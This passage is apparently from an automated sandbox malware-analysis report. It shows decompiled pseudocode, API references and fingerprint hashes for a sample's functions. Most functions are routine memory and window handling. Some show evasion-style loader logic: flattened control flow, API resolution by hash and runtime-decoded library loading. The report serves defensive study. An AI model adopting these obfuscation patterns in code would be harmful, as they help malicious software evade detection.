Instruction Fuzzy Hash: CD11BFB5F203016BD715F7F4A894A6B36E7AFC0644B04086CE456CB248EE78CA118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00412710, Relevance: 3.0, APIs: 2, Instructions: 27
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00412710() {
				void* _t6;
				void* _t7;
				struct HHOOK__* _t9;
				void* _t18;

				_t6 = E00424BFB();
				if( *((char*)(_t6 + 0x14)) == 0) {
					_t7 = E004249C4();
					_t9 = SetWindowsHookExA(0xffffffff, E00412A65, 0, GetCurrentThreadId()); // executed
					_push(E00424441);
					 *(_t7 + 0x30) = _t9;
					_t18 = E00425D27(0x439c50);
					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E00424BFB() + 8)));
					}
					return E00425C92(0x439c4c, E00424456);
				}
				return _t6;
			}

0x00412710
0x00412719
0x0041271c
0x00412733
0x00412739
0x00412743
0x0041274b
0x00412751
0x0041275b
0x0041275b
0x00000000
0x0041276d
0x0041276e

APIs

GetCurrentThreadId.KERNEL32 ref: 00412723
SetWindowsHookExA.USER32 ref: 00412733

Part of subcall function 00425D27: __EH_prolog.LIBCMT ref: 00425D2C

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID:
API String ID: 2183259885-0
Opcode ID: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
Instruction ID: e1aa810c2eef3cfbe5d0c04a06800172916402ab6d7e5109c2f22e34ec283244
Opcode Fuzzy Hash: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
Instruction Fuzzy Hash: 59F020313006302BCB307B70BA0EB5A2A90DF44318F804A1BF0619A0E2CBBC8C80C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040796F, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040796F(intOrPtr _a4) {
				void* _t6;
				void* _t9;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x43b63c = _t6;
				if(_t6 == 0) {
					L3:
					return 0;
				} else {
					if(E00407A4A() != 0) {
						_t9 = 1;
						return _t9;
					} else {
						HeapDestroy( *0x43b63c);
						goto L3;
					}
				}
			}

0x00407980
0x00407988
0x0040798d
0x004079a4
0x004079a6
0x0040798f
0x00407996
0x004079a9
0x004079aa
0x00407998
0x0040799e
0x00000000
0x0040799e
0x00407996

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980

Part of subcall function 00407A4A: HeapAlloc.KERNEL32(00000000,00000140,00407994), ref: 00407A57

HeapDestroy.KERNEL32 ref: 0040799E

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
Instruction ID: 148b4dcf31a7c6b17fb8364a85278eb553451c51f0f99df079208ecffef983c8
Opcode Fuzzy Hash: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
Instruction Fuzzy Hash: 26E012B0755301AEEB101B31AC0677A36D4DB54782F149436F544D41F4E7B895519A4B

Uniqueness

Uniqueness Score: -1.00%

Function 02235CA0, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t5;
				void* _t8;
				void* _t10;

				E02236530(_t8);
				if( *0x223e094 == 0) {
					 *0x223e094 = E02233E80(_t5, E02233F20(0xbb398380), 0xff20810a, _t10);
				}
				ExitProcess(0);
			}

0x02235ca0
0x02235cac
0x02235cc4
0x02235cc4
0x02235ccb

APIs

ExitProcess.KERNEL32(00000000), ref: 02235CCB

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c18f626bd62c2e601dedae607d7f27ce85d5ff8326e1735b070e030a7c522120
Instruction ID: a7008425a57ec5e33412e394bdf2e75d99925af604c04b986ca7cbd526e88a97
Opcode Fuzzy Hash: c18f626bd62c2e601dedae607d7f27ce85d5ff8326e1735b070e030a7c522120
Instruction Fuzzy Hash: F1D0C9A6B61301A6E601AAF0785472A25AB5FA0645F404819F549DA29CEE7489214AD1

Uniqueness

Uniqueness Score: -1.00%

Function 02236FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E02236FB0(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr* _t6;
				intOrPtr* _t8;
				void* _t21;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x2f7561b9;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x16eb9dc5;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							E02236F10(_t21, 0x223d770, 4, __eflags);
							_t2 = 0x28da268b;
							continue;
						} else {
							_t55 = _t2 - 0x96aa655;
							if(_t55 > 0) {
								__eflags = _t2 - 0x129c963b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02236F10(_t21, 0x223d7c0, 3, __eflags);
									_t2 = 0x16eb9dc5;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E02236F10(_t21, 0x223d840, 1, __eflags);
									_t2 = 0x6462a46;
									continue;
								} else {
									if(_t2 == 0x34398df) {
										E02236F10(_t21, 0x223d820, 0, __eflags);
										_t2 = 0x96aa655;
										continue;
									} else {
										_t57 = _t2 - 0x6462a46;
										if(_t2 != 0x6462a46) {
											goto L21;
										} else {
											E02236F10(_t21, 0x223d890, 2, _t57);
											_t2 = 0x129c963b;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2cd0d411;
					if(__eflags > 0) {
						__eflags = _t2 - 0x2f7561b9;
						if(__eflags != 0) {
							goto L21;
						} else {
							_t2 = 0x34398df;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 = E022334C0(0x223d7f0);
							__eflags =  *0x223ddc4;
							if( *0x223ddc4 == 0) {
								 *0x223ddc4 = E02233E80(_t21, E02233F20(0xbb398380), 0x9261db99, _t53);
							}
							_t5 = LoadLibraryW(_t51); // executed
							 *( *0x223e2e8 + 0x28) = _t5;
							_t6 =  *0x223dea8;
							__eflags = _t6;
							if(_t6 == 0) {
								_t6 = E02233E80(_t21, E02233F20(0xbb398380), 0x97f883e, _t53);
								 *0x223dea8 = _t6;
							}
							_t48 =  *_t6();
							_t8 =  *0x223e1a0;
							__eflags = _t8;
							if(_t8 == 0) {
								_t8 = E02233E80(_t21, E02233F20(0xbb398380), 0x26c3f343, _t53);
								 *0x223e1a0 = _t8;
							}
							return  *_t8(_t48, 0, _t51);
						} else {
							__eflags = _t2 - 0x17b18c59;
							if(__eflags == 0) {
								E02236F10(_t21, 0x223d870, 6, __eflags);
								_t2 = 0x2cd0d411;
								goto L1;
							} else {
								__eflags = _t2 - 0x28da268b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02236F10(_t21, 0x223d790, 5, __eflags);
									_t2 = 0x17b18c59;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x2a0eb481;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}

0x02236fb0
0x02236fb0
0x02236fb0
0x02236fb5
0x02236fb5
0x02236fb5
0x02236fb5
0x02236fba
0x00000000
0x00000000
0x02236fc0
0x0223704a
0x0223704f
0x00000000
0x02236fc2
0x02236fc2
0x02236fc7
0x0223701c
0x02237021
0x00000000
0x02237027
0x02237031
0x02237036
0x00000000
0x02237036
0x02236fc9
0x02236fc9
0x02237010
0x02237015
0x00000000
0x02236fcb
0x02236fd0
0x02236ffa
0x02236fff
0x00000000
0x02236fd2
0x02236fd2
0x02236fd7
0x00000000
0x02236fdd
0x02236fe7
0x02236fec
0x00000000
0x02236fec
0x02236fd7
0x02236fd0
0x02236fc9
0x02236fc7
0x00000000
0x02236fc0
0x02237059
0x0223705e
0x022370a2
0x022370a7
0x00000000
0x022370a9
0x022370a9
0x00000000
0x022370a9
0x02237060
0x02237060
0x022370cb
0x022370d2
0x022370d4
0x022370ec
0x022370ec
0x022370f2
0x022370fa
0x022370fd
0x02237102
0x02237104
0x02237117
0x0223711c
0x0223711c
0x02237123
0x02237125
0x0223712a
0x0223712c
0x0223713f
0x02237144
0x02237144
0x02237151
0x02237062
0x02237062
0x02237067
0x02237093
0x02237098
0x00000000
0x02237069
0x02237069
0x0223706e
0x00000000
0x02237070
0x0223707a
0x0223707f
0x00000000
0x0223707f
0x0223706e
0x02237067
0x02237060
0x00000000
0x022370b3
0x022370b3
0x022370b3
0x022370be
0x00000000

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022368DC), ref: 022370F2

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c604fecd2f357d0cd35e3c68154e47d7c3af0cb7dab060c071d8e2c53ccdbbba
Instruction ID: 9b2ced41c999442ca5a45b78ee36d5abc03ac4ebb41b76e00b316bc642c36f38
Opcode Fuzzy Hash: c604fecd2f357d0cd35e3c68154e47d7c3af0cb7dab060c071d8e2c53ccdbbba
Instruction Fuzzy Hash: DD31A1E5B3420267DE27AAF9649433B515F9B84244F64086AF043CF35CDEB9CD128BD6

Uniqueness

Uniqueness Score: -1.00%

Function 02236F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02236F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E022334C0(__ecx);
				if( *0x223ddc4 == 0) {
					 *0x223ddc4 = E02233E80(__ebx, E02233F20(0xbb398380), 0x9261db99, _t31);
				}
				_t6 = LoadLibraryW(_t30); // executed
				 *( *0x223e2e8 + 0xc + _t28 * 4) = _t6;
				_t7 =  *0x223dea8;
				if(_t7 == 0) {
					_t7 = E02233E80(_t15, E02233F20(0xbb398380), 0x97f883e, _t31);
					 *0x223dea8 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x223e1a0;
				if(_t9 == 0) {
					_t9 = E02233E80(_t15, E02233F20(0xbb398380), 0x26c3f343, _t31);
					 *0x223e1a0 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}

0x02236f10
0x02236f12
0x02236f19
0x02236f22
0x02236f3a
0x02236f3a
0x02236f40
0x02236f48
0x02236f4c
0x02236f53
0x02236f66
0x02236f6b
0x02236f6b
0x02236f72
0x02236f74
0x02236f7b
0x02236f8e
0x02236f93
0x02236f93
0x02236fa0

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0223704F,022368DC), ref: 02236F40

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c3d711c0ca32f0422ebe1e4e81bf2c4620ba86f4f24b7bd6bbb35e06b957768c
Instruction ID: 32c49b9775d694e3b7a3f54abddbe24539b001b80e5412cb69339c7507e8b41b
Opcode Fuzzy Hash: c3d711c0ca32f0422ebe1e4e81bf2c4620ba86f4f24b7bd6bbb35e06b957768c
Instruction Fuzzy Hash: FE0178B5B21301ABD715FBF4B89472A26EBAFC06947040CA8F006CB348EE38DD018BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00408198, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408198(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _t45;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t69;
				void* _t70;
				void* _t77;
				signed int _t78;
				intOrPtr _t81;

				_t60 = _a4;
				_t81 =  *((intOrPtr*)(_t60 + 0x10));
				_t45 =  *(_t60 + 8);
				_t57 = 0;
				while(_t45 >= 0) {
					_t45 = _t45 << 1;
					_t57 = _t57 + 1;
				}
				_t69 = 0x3f;
				_t48 = _t57 * 0x204 + _t81 + 0x144;
				_v8 = _t48;
				do {
					 *((intOrPtr*)(_t48 + 8)) = _t48;
					 *((intOrPtr*)(_t48 + 4)) = _t48;
					_t48 = _t48 + 8;
					_t69 = _t69 - 1;
				} while (_t69 != 0);
				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
				if(_t49 != 0) {
					_t70 = _t77 + 0x7000;
					if(_t77 <= _t70) {
						_t55 = _t77 + 0x10;
						do {
							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
							 *_t55 = _t55 + 0xffc;
							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
							_t55 = _t55 + 0x1000;
						} while (_t55 - 0x10 <= _t70);
					}
					_t61 = _t77 + 0xc;
					_t51 = _v8 + 0x1f8;
					_t78 = 1;
					 *((intOrPtr*)(_t51 + 4)) = _t61;
					 *((intOrPtr*)(_t61 + 8)) = _t51;
					_t62 = _t70 + 0xc;
					 *((intOrPtr*)(_t51 + 8)) = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t51;
					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
					_t52 =  *((intOrPtr*)(_t81 + 0x43));
					_t53 = _a4;
					 *((char*)(_t81 + 0x43)) = _t52 + 1;
					if(_t52 == 0) {
						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
					}
					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
					_t54 = _t57;
				} else {
					_t54 = _t49 | 0xffffffff;
				}
				return _t54;
			}

0x0040819c
0x004081a2
0x004081a5
0x004081a8
0x004081aa
0x004081ae
0x004081b0
0x004081b0
0x004081bd
0x004081be
0x004081c5
0x004081c8
0x004081c8
0x004081cb
0x004081ce
0x004081d1
0x004081d1
0x004081db
0x004081e9
0x004081f1
0x004081fb
0x00408203
0x00408205
0x00408208
0x00408208
0x0040820c
0x00408219
0x00408220
0x00408228
0x0040822b
0x00408235
0x0040823d
0x00408208
0x00408244
0x00408247
0x0040824e
0x0040824f
0x00408252
0x00408255
0x00408258
0x0040825b
0x0040825e
0x00408263
0x0040826a
0x00408273
0x00408276
0x00408279
0x0040827b
0x0040827b
0x00408289
0x0040828c
0x004081f3
0x004081f3
0x004081f3
0x00408292

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00407EBE,000000E0,00000000,?,?,?,004063F8), ref: 004081E9

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
Instruction ID: a951a9915c6437c0f42f98627e617b565139ecfdaa8fc563ef3f50a1ca92f44d
Opcode Fuzzy Hash: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
Instruction Fuzzy Hash: FC319A316006068FD314CF18C984BA5BBE0FF50364F2482BED5598B3E2DB74A906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00407333, Relevance: 1.3, APIs: 1, Instructions: 56
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00407333(signed int _a4, signed int _a8) {
				void* _t8;
				long _t11;
				void* _t13;
				long _t15;
				void* _t17;
				void* _t23;

				_t15 = _a4 * _a8;
				_t11 = _t15;
				if(_t15 <= 0xffffffe0) {
					if(_t15 == 0) {
						_t15 = 1;
					}
					_t15 = _t15 + 0x0000000f & 0xfffffff0;
				}
				while(1) {
					_t13 = 0;
					if(_t15 > 0xffffffe0) {
						goto L8;
					}
					_t23 = _t11 -  *0x436fa8; // 0x3f8
					if(_t23 > 0) {
						L7:
						_t13 = HeapAlloc( *0x43b63c, 8, _t15);
						if(_t13 != 0) {
							L12:
							return _t13;
						}
						goto L8;
					}
					E004079D4(9);
					_push(_t11); // executed
					_t8 = E00407DDE(); // executed
					_t13 = _t8;
					E00407A35(9);
					_t17 = _t17 + 0xc;
					if(_t13 != 0) {
						E00406330(_t13, 0, _t11);
						goto L12;
					}
					goto L7;
					L8:
					if( *0x439d64 == 0) {
						goto L12;
					}
					if(E00407954(_t15) == 0) {
						return 0;
					}
				}
			}

0x0040733a
0x00407342
0x00407344
0x00407348
0x0040734c
0x0040734c
0x00407350
0x00407350
0x00407353
0x00407353
0x00407358
0x00000000
0x00000000
0x0040735a
0x00407360
0x0040737f
0x0040738e
0x00407392
0x004073b6
0x00000000
0x004073b6
0x00000000
0x00407392
0x00407364
0x00407369
0x0040736a
0x00407371
0x00407373
0x00407378
0x0040737d
0x004073ae
0x00000000
0x004073b3
0x00000000
0x00407394
0x0040739b
0x00000000
0x00000000
0x004073a6
0x00000000
0x004073bc
0x004073a8

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
Instruction ID: 3f3aad503001cd6b8f63a7fd222fe274e9ba08c9a4469d1d6c832ccce610b396
Opcode Fuzzy Hash: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
Instruction Fuzzy Hash: B901F522E086106AF62166296C42B6B22059B807A9F1A0137FE54772D2D6787C01E1EF

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00410E05, Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00410E05(signed int __ecx) {
				signed int _t116;
				signed int _t119;
				signed int _t120;
				struct HWND__* _t124;
				signed int _t126;
				intOrPtr _t127;
				signed char _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				void* _t160;
				intOrPtr* _t167;
				signed int _t169;
				signed int _t182;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t198;
				void* _t200;
				signed short _t208;
				intOrPtr _t211;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t116 = E00406520(E0042AA5D, _t215);
				_t218 = _t217 - 0x74;
				_t167 =  *((intOrPtr*)(_t215 + 8));
				_t208 =  *(_t167 + 4);
				_t198 = __ecx;
				 *(_t215 - 0x10) = __ecx;
				 *(_t215 - 0x1c) = _t208;
				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
					_t116 = GetKeyState(1);
					if(_t116 < 0) {
						L49:
						_t208 =  *(_t215 - 0x1c);
						goto L50;
					}
					_t116 = GetKeyState(2);
					if(_t116 < 0) {
						goto L49;
					}
					_t116 = GetKeyState(4);
					if(_t116 < 0) {
						goto L49;
					} else {
						_push( *_t167);
						L9:
						_t116 = E00413740(_t215);
						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
							_push(GetParent( *(_t116 + 0x1c)));
							goto L9;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							_t211 = E00425C92(0x4397cc, E0042440D);
							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
							_t169 =  *(_t211 + 0xcc);
							_t119 = E00414D17(_t198);
							__eflags = _t169;
							 *(_t215 - 0x14) = _t119;
							if(_t169 == 0) {
								L19:
								_t120 = E004131DD(0x58);
								 *(_t215 - 0x1c) = _t120;
								_t169 = 0;
								__eflags = _t120;
								 *(_t215 - 4) = 0;
								if(__eflags != 0) {
									_t169 = E00410AA2(_t120);
								}
								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
								_push(1);
								_t116 = E00410AF7(_t169, __eflags,  *(_t215 - 0x14));
								__eflags = _t116;
								if(_t116 != 0) {
									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
									_t198 =  *(_t215 - 0x10);
									 *(_t211 + 0xcc) = _t169;
									L25:
									E00406330(_t215 - 0x54, 0, 0x2c);
									_t124 =  *(_t198 + 0x1c);
									_t220 = _t218 + 0xc;
									 *(_t215 - 0x4c) = _t124;
									 *(_t215 - 0x48) = _t124;
									 *(_t215 - 0x54) = 0x28;
									 *(_t215 - 0x50) = 1;
									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
									__eflags = _t126;
									if(_t126 == 0) {
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
									}
									_t127 =  *((intOrPtr*)(_t215 + 8));
									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
									 *(_t215 - 0x28) =  *(_t127 + 0x14);
									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
									E00406330(_t215 - 0x80, 0, 0x2c);
									_t221 = _t220 + 0xc;
									 *(_t215 - 0x80) = 0x28;
									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
									 *(_t215 - 0x1c) = _t116;
									asm("sbb ecx, ecx");
									_t182 =  ~(_t116 + 1) & _t198;
									__eflags =  *(_t211 + 0xd4) - _t116;
									 *(_t215 - 0x14) = _t182;
									if( *(_t211 + 0xd4) != _t116) {
										L33:
										__eflags = _t116 - 0xffffffff;
										if(_t116 == 0xffffffff) {
											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
											L42:
											E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
											__eflags =  *(_t211 + 0xd8) - 0x28;
											_t91 = _t211 + 0xd8; // 0xd8
											_t200 = _t91;
											if( *(_t211 + 0xd8) >= 0x28) {
												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
											}
											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
											_t183 = 0xb;
											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
											goto L45;
										}
										_t186 = 0xb;
										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
										_t221 = _t221 + 0xc;
										_t188 =  *(_t215 - 0x10);
										 *(_t215 - 0x50) = _t141;
										__eflags =  *(_t188 + 0x24) & 0x00000400;
										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
											_t150 = _t141 | 0x00000020;
											__eflags = _t150;
											 *(_t215 - 0x50) = _t150;
										}
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
										__eflags =  *(_t215 - 0x79) & 0x00000040;
										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
											L38:
											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
											_t145 =  *(_t215 - 0x10);
											__eflags =  *(_t145 + 0x24) & 0x00000400;
											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
											}
											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
											goto L41;
										} else {
											_t149 = E00414D5B( *(_t215 - 0x10));
											__eflags = _t149;
											if(_t149 == 0) {
												L41:
												_t211 =  *((intOrPtr*)(_t215 - 0x18));
												goto L42;
											}
											goto L38;
										}
									} else {
										__eflags =  *(_t211 + 0xd0) - _t182;
										if( *(_t211 + 0xd0) != _t182) {
											goto L33;
										}
										__eflags =  *(_t198 + 0x25) & 0x00000004;
										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
											__eflags = _t116 - 0xffffffff;
											if(_t116 != 0xffffffff) {
												_t116 = E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
											}
										} else {
											GetCursorPos(_t215 - 0x20);
											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
										}
										L45:
										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
											__eflags =  *(_t215 - 0x60);
											if( *(_t215 - 0x60) == 0) {
												_t116 = E004062E0( *((intOrPtr*)(_t215 - 0x5c)));
											}
										}
										goto L78;
									}
								} else {
									__eflags = _t169;
									if(_t169 != 0) {
										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
									}
									goto L78;
								}
							}
							_t160 = E00404FFE(_t169);
							__eflags = _t160 -  *(_t215 - 0x14);
							if(_t160 !=  *(_t215 - 0x14)) {
								 *((intOrPtr*)( *_t169 + 0x58))();
								 *((intOrPtr*)( *_t169 + 4))(1);
								_t169 = 0;
								__eflags = 0;
								 *(_t211 + 0xcc) = 0;
							}
							__eflags = _t169;
							if(_t169 != 0) {
								goto L25;
							} else {
								goto L19;
							}
						} else {
							__eflags = _t116;
							if(_t116 == 0) {
								_t116 = E00425C92(0x4397cc, E0042440D);
								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
							}
							goto L78;
						}
					}
				} else {
					L50:
